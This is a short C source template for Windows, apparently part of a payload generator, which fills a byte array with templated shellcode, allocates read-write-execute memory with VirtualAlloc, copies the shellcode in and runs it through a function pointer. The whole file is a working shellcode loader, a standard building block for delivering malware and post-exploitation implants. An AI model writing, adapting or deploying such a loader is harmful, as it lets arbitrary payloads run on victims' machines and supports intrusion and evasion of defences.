#include <windows.h>

DWORD WINAPI run() {
  unsigned char shellcode[] = {{ byteArray .Shellcode }};
  SIZE_T shellcode_len = {{ len .Shellcode }};

  LPVOID dest = VirtualAlloc(NULL, shellcode_len, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (dest == NULL)
  {
    return 0;
  }
  memcpy(dest, shellcode, shellcode_len);


  void (*function)();
  function = (void (*)())dest;
  function();

  return 0;
}

int main() {
  run();
  return 0;
}
